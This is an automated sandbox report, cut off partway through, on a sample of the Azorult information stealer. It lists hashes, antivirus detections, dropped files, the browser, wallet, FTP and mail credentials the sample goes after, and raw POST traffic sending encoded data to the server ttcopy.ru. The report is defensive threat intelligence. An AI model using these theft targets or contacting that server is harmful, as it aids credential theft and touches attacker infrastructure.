Exes_ce999007e538467ec297d6b96ccd1146_exe_2019-06-26_09_30.json

1.  
2. [*] MalFamily: "Azorult"
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "Exes_ce999007e538467ec297d6b96ccd1146.exe"
7. [*] File Size: 1607168
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9. [*] SHA256: "e62d32662182b336a3ec9800293f52a03b28074758b5ebd892ce70bc45511be6"
10. [*] MD5: "ce999007e538467ec297d6b96ccd1146"
11. [*] SHA1: "e5b907b2237e56ca159aea9695d9a47c9923cd1e"
12. [*] SHA512: "efacc45e31106a2e6a533d1dba943a1da6700036ea3a8c78cf6a3b67b711f28226632f0cb4128b77960ea198f6937b88a2a5d8cb672343dd6985ffebc5df9074"
13. [*] CRC32: "FE875C86"
14. [*] SSDEEP: "49152:ph+ZkldoPK1XaLIj4+31EjoLjfQk1Tn4:K2cPK1svu1EjmjfQk"
15.  
16. [*] Process Execution: [
17. "Exes_ce999007e538467ec297d6b96ccd1146.exe",
18. "Exes_ce999007e538467ec297d6b96ccd1146.exe",
19. "services.exe",
20. "lsass.exe",
21. "taskhost.exe",
22. "sc.exe",
23. "svchost.exe",
24. "svchost.exe",
25. "WerFault.exe"
26. ]
27.  
28. [*] Signatures Detected: [
29. {
30. "Description": "At least one process apparently crashed during execution",
31. "Details": []
32. },
33. {
34. "Description": "Creates RWX memory",
35. "Details": []
36. },
37. {
38. "Description": "Reads data out of its own binary image",
39. "Details": [
40. {
41. "self_read": "process: Exes_ce999007e538467ec297d6b96ccd1146.exe, pid: 3068, offset: 0x00188200, length: 0x00000400"
42. }
43. ]
44. },
45. {
46. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
47. "Details": [
48. {
49. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
50. },
51. {
52. "suspicious_request": "http://ttcopy.ru/index.php"
53. }
54. ]
55. },
56. {
57. "Description": "Performs some HTTP requests",
58. "Details": [
59. {
60. "url": "http://ttcopy.ru/index.php"
61. }
62. ]
63. },
64. {
65. "Description": "The binary likely contains encrypted or compressed data.",
66. "Details": [
67. {
68. "section": "name: .rsrc, entropy: 7.96, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x000be000, virtual_size: 0x000bdf40"
69. }
70. ]
71. },
72. {
73. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
74. "Details": [
75. {
76. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 12574182 times"
77. }
78. ]
79. },
80. {
81. "Description": "Steals private information from local Internet browsers",
82. "Details": [
83. {
84. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
85. }
86. ]
87. },
88. {
89. "Description": "Collects information about installed applications",
90. "Details": [
91. {
92. "Program": "Google Update Helper"
93. },
94. {
95. },
96. {
97. "Program": "Microsoft Excel MUI 2013"
98. },
99. {
100. "Program": "Microsoft Outlook MUI 2013"
101. },
102. {
103. },
104. {
105. "Program": "Google Chrome"
106. },
107. {
108. "Program": "Adobe Flash Player 29 NPAPI"
109. },
110. {
111. "Program": "Adobe Flash Player 29 ActiveX"
112. },
113. {
114. "Program": "Microsoft DCF MUI 2013"
115. },
116. {
117. "Program": "Microsoft Access MUI 2013"
118. },
119. {
120. "Program": "Microsoft Office Proofing Tools 2013 - English"
121. },
122. {
123. "Program": "Adobe Acrobat Reader DC"
124. },
125. {
126. "Program": "Microsoft Publisher MUI 2013"
127. },
128. {
129. "Program": "Microsoft Office Shared MUI 2013"
130. },
131. {
132. "Program": "Microsoft Office OSM MUI 2013"
133. },
134. {
135. "Program": "Microsoft InfoPath MUI 2013"
136. },
137. {
138. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
139. },
140. {
141. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
142. },
143. {
144. "Program": "Microsoft Word MUI 2013"
145. },
146. {
147. "Program": "Microsoft OneDrive"
148. },
149. {
150. "Program": "Microsoft Groove MUI 2013"
151. },
152. {
153. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
154. },
155. {
156. },
157. {
158. "Program": "Microsoft Access Setup Metadata MUI 2013"
159. },
160. {
161. "Program": "Microsoft Office OSM UX MUI 2013"
162. },
163. {
164. "Program": "Java Auto Updater"
165. },
166. {
167. "Program": "Microsoft PowerPoint MUI 2013"
168. },
169. {
170. "Program": "Microsoft Office Professional Plus 2013"
171. },
172. {
173. "Program": "Adobe Refresh Manager"
174. },
175. {
176. "Program": "Microsoft Office Proofing 2013"
177. },
178. {
179. "Program": "Microsoft Lync MUI 2013"
180. },
181. {
182. },
183. {
184. "Program": "Microsoft OneNote MUI 2013"
185. }
186. ]
187. },
188. {
189. "Description": "File has been identified by 19 Antiviruses on VirusTotal as malicious",
190. "Details": [
191. {
192. "FireEye": "Generic.mg.ce999007e538467e"
193. },
194. {
195. "Invincea": "heuristic"
196. },
197. {
198. "Symantec": "ML.Attribute.HighConfidence"
199. },
200. {
201. "APEX": "Malicious"
202. },
203. {
204. "Paloalto": "generic.ml"
205. },
206. {
207. "Rising": "Trojan.Win32.Agent_.sa (CLASSIC)"
208. },
209. {
210. "Endgame": "malicious (high confidence)"
211. },
212. {
213. "Comodo": "Application.Win32.InstallMetrix.LQL@5qtrlc"
214. },
215. {
216. "McAfee-GW-Edition": "BehavesLike.Win32.Downloader.tc"
217. },
218. {
219. "Trapmine": "malicious.high.ml.score"
220. },
221. {
222. "SentinelOne": "DFI - Suspicious PE"
223. },
224. {
225. "Antiy-AVL": "Trojan/Generic.ASVCS3S.1E5"
226. },
227. {
228. "Microsoft": "Trojan:Win32/Fuerboos.D!cl"
229. },
230. {
231. "Acronis": "suspicious"
232. },
233. {
234. "Cylance": "Unsafe"
235. },
236. {
237. "ESET-NOD32": "a variant of Win32/Injector.Autoit.EBW"
238. },
239. {
240. "Cybereason": "malicious.2237e5"
241. },
242. {
243. "CrowdStrike": "win/malicious_confidence_60% (D)"
244. },
245. {
246. "Qihoo-360": "HEUR/QVM10.1.1E69.Malware.Gen"
247. }
248. ]
249. },
250. {
251. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
252. "Details": []
253. },
254. {
255. "Description": "Checks the system manufacturer, likely for anti-virtualization",
256. "Details": []
257. },
258. {
259. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
260. "Details": [
261. {
262. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
263. },
264. {
265. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
266. },
267. {
268. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
269. },
270. {
271. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
272. },
273. {
274. "file": "C:\\Users\\user\\AppData\\wallet.dat"
275. },
276. {
277. "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
278. },
279. {
280. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
281. },
282. {
283. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
284. },
285. {
286. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
287. }
288. ]
289. },
290. {
291. "Description": "Harvests credentials from local FTP client softwares",
292. "Details": [
293. {
294. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
295. }
296. ]
297. },
298. {
299. "Description": "Harvests information related to installed instant messenger clients",
300. "Details": [
301. {
302. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
303. }
304. ]
305. },
306. {
307. "Description": "Harvests information related to installed mail clients",
308. "Details": [
309. {
310. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
311. },
312. {
313. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
314. },
315. {
316. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
317. },
318. {
319. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
320. },
321. {
322. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
323. },
324. {
325. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
326. },
327. {
328. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
329. },
330. {
331. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
332. },
333. {
334. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
335. },
336. {
337. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
338. },
339. {
340. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
341. },
342. {
343. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
344. },
345. {
346. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
347. },
348. {
349. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
350. },
351. {
352. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
353. },
354. {
355. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
356. },
357. {
358. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
359. },
360. {
361. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
362. },
363. {
364. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
365. },
366. {
367. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
368. },
369. {
370. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
371. }
372. ]
373. },
374. {
375. "Description": "Collects information to fingerprint the system",
376. "Details": []
377. },
378. {
379. "Description": "Anomalous binary characteristics",
380. "Details": [
381. {
382. "anomaly": "Actual checksum does not match that reported in PE header"
383. }
384. ]
385. },
386. {
387. "Description": "Created network traffic indicative of malicious activity",
388. "Details": [
389. {
390. "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
391. }
392. ]
393. }
394. ]
395.  
396. [*] Started Service: [
397. "VaultSvc",
398. "WerSvc",
399. "W32Time"
400. ]
401.  
402. [*] Executed Commands: [
403. "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_ce999007e538467ec297d6b96ccd1146.exe\"",
404. "C:\\Windows\\system32\\lsass.exe",
405. "taskhost.exe $(Arg0)",
406. "C:\\Windows\\system32\\sc.exe start w32time task_started",
407. "C:\\Windows\\system32\\svchost.exe -k LocalService",
408. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
409. "C:\\Windows\\system32\\WerFault.exe -u -p 2404 -s 292"
410. ]
411.  
412. [*] Mutexes: [
413. "frenchy_shellcode_002",
414. "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726",
415. "Local\\WERReportingForProcess2404",
416. "Global\\\\xe5\\x88\\x90\\xc2\\x9b"
417. ]
418.  
419. [*] Modified Files: [
420. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
421. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
422. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
423. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
424. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
425. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
426. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
427. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
428. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
429. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
430. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
431. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
432. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
433. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
434. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
435. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
436. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
437. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
438. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
439. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
440. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
441. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
442. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
443. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
444. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
445. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
446. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
447. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
448. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
449. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
450. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
451. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
452. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
453. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
454. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
455. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
456. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
457. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
458. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
459. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
460. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
461. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
462. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
463. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
464. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
465. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
466. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
467. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
468. "C:\\Users\\user\\AppData\\Local\\Temp\\24158296549726957269837.tmp",
469. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
470. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
471. "\\??\\PIPE\\lsarpc",
472. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAD5E.tmp.appcompat.txt",
473. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER572C.tmp.WERInternalMetadata.xml",
474. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER573C.tmp.hdmp"
475. ]
476.  
477. [*] Deleted Files: [
478. "C:\\Users\\user\\AppData\\Local\\Temp\\24158296549726957269837.tmp",
479. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
480. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
481. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
482. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
483. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
484. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
485. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
486. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
487. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
488. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
489. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
490. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
491. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
492. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
493. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
494. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
495. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
496. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
497. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
498. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
499. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
500. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
501. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
502. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
503. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
504. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
505. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
506. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
507. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
508. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
509. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
510. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
511. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
512. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
513. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
514. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
515. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
516. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
517. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
518. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
519. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
520. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
521. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
522. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
523. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
524. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
525. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
526. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
527. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\",
528. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAD5E.tmp",
529. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAD5E.tmp.appcompat.txt",
530. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER572C.tmp",
531. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER572C.tmp.WERInternalMetadata.xml",
532. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER573C.tmp",
533. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER573C.tmp.hdmp"
534. ]
535.  
536. [*] Modified Registry Keys: [
537. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
538. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
539. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
540. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
541. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
542. ]
543.  
544. [*] Deleted Registry Keys: []
545.  
546. [*] DNS Communications: [
547. {
548. "type": "A",
549. "request": "ttcopy.ru",
550. "answers": [
551. {
552. "data": "185.62.190.234",
553. "type": "A"
554. }
555. ]
556. }
557. ]
558.  
559. [*] Domains: [
560. {
561. "ip": "185.62.190.234",
562. "domain": "ttcopy.ru"
563. }
564. ]
565.  
566. [*] Network Communication - ICMP: []
567.  
568. [*] Network Communication - HTTP: [
569. {
570. "count": 1,
571. "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
572. "uri": "http://ttcopy.ru/index.php",
573. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
574. "method": "POST",
575. "host": "ttcopy.ru",
576. "version": "1.1",
577. "path": "/index.php",
578. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ttcopy.ru\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
579. "port": 80
580. },
581. {
582. "count": 1,
583. "body": "",
584. "uri": "http://ttcopy.ru/index.php",
585. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
586. "method": "POST",
587. "host": "ttcopy.ru",
588. "version": "1.1",
589. "path": "/index.php",
590. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ttcopy.ru\r\nContent-Length: 3821\r\nCache-Control: no-cache\r\n\r\n",
591. "port": 80
592. }
593. ]
594.  
595. [*] Network Communication - SMTP: []
596.  
597. [*] Network Communication - Hosts: []
598.  
599. [*] Network Communication - IRC: []
600.  
601. [*] Static Analysis: {
602. "pe": {
603. "peid_signatures": null,
604. "imports": [
605. {
606. "imports": [
607. {
608. "name": "WSACleanup",
609. "address": "0x48f7c8"
610. },
611. {
612. "name": "socket",
613. "address": "0x48f7cc"
614. },
615. {
616. "name": "inet_ntoa",
617. "address": "0x48f7d0"
618. },
619. {
620. "name": "setsockopt",
621. "address": "0x48f7d4"
622. },
623. {
624. "name": "ntohs",
625. "address": "0x48f7d8"
626. },
627. {
628. "name": "recvfrom",
629. "address": "0x48f7dc"
630. },
631. {
632. "name": "ioctlsocket",
633. "address": "0x48f7e0"
634. },
635. {
636. "name": "htons",
637. "address": "0x48f7e4"
638. },
639. {
640. "name": "WSAStartup",
641. "address": "0x48f7e8"
642. },
643. {
644. "name": "__WSAFDIsSet",
645. "address": "0x48f7ec"
646. },
647. {
648. "name": "select",
649. "address": "0x48f7f0"
650. },
651. {
652. "name": "accept",
653. "address": "0x48f7f4"
654. },
655. {
656. "name": "listen",
657. "address": "0x48f7f8"
658. },
659. {
660. "name": "bind",
661. "address": "0x48f7fc"
662. },
663. {
664. "name": "closesocket",
665. "address": "0x48f800"
666. },
667. {
668. "name": "WSAGetLastError",
669. "address": "0x48f804"
670. },
671. {
672. "name": "recv",
673. "address": "0x48f808"
674. },
675. {
676. "name": "sendto",
677. "address": "0x48f80c"
678. },
679. {
680. "name": "send",
681. "address": "0x48f810"
682. },
683. {
684. "name": "inet_addr",
685. "address": "0x48f814"
686. },
687. {
688. "name": "gethostbyname",
689. "address": "0x48f818"
690. },
691. {
692. "name": "gethostname",
693. "address": "0x48f81c"
694. },
695. {
696. "name": "connect",
697. "address": "0x48f820"
698. }
699. ],
700. "dll": "WSOCK32.dll"
701. },
702. {
